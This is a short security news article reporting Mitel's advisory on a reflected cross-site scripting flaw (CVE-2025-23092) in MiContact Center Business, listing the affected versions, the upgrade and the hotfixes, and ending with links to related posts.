do son 
Mitel has issued a security advisory regarding a reflected cross-site scripting (XSS) vulnerability, tracked as CVE-2025-23092 (CVSS 7.1), in the Legacy Chat component of its MiContact Center Business software.
The advisory states that successful exploitation of this XSS vulnerability could allow an unauthenticated attacker to execute arbitrary scripts. This could enable the attacker to obtain sensitive information and modify the current chat session.
While the vulnerability is rated as high severity, Mitel notes that the impact on confidentiality and integrity is limited.
The following versions of MiContact Center Business are affected:
- 10.2.0.0 through 10.2.0.4
- 10.1.0.0 through 10.1.0.5
- 10.0.0.0 through 10.0.0.4
- 9.5.0.3 and earlier
Mitel strongly recommends that customers with affected product versions apply the provided fixes. The specific solutions vary depending on the product version:
- For version 10.2.0.0 through 10.2.0.4, the recommendation is to upgrade to MiContact Center Business version 10.2.0.5 or later.
- Mitel has also provided hotfixes KB571322, KB571372, and KB571320 for releases 10.1.0.5, 10.0.0.4, and 9.5.0.3, respectively.
- Customers using version 9.5.0.3 or earlier are advised to upgrade to a supported release and apply the corresponding hotfix or upgrade to a later release.
Related Posts:
- Mitel Issues Critical Fixes for XSS Vulnerabilities in MiContact Center Business
- CISA Alerts on Actively Exploited Vulnerabilities in Mitel MiCollab and Oracle WebLogic Server
- Mitel Issues Critical Security Advisory for PHP Argument Injection Vulnerability
- Unpatched Zero-Day Vulnerability in Mitel MiCollab Exposes Businesses to Serious Security Risks
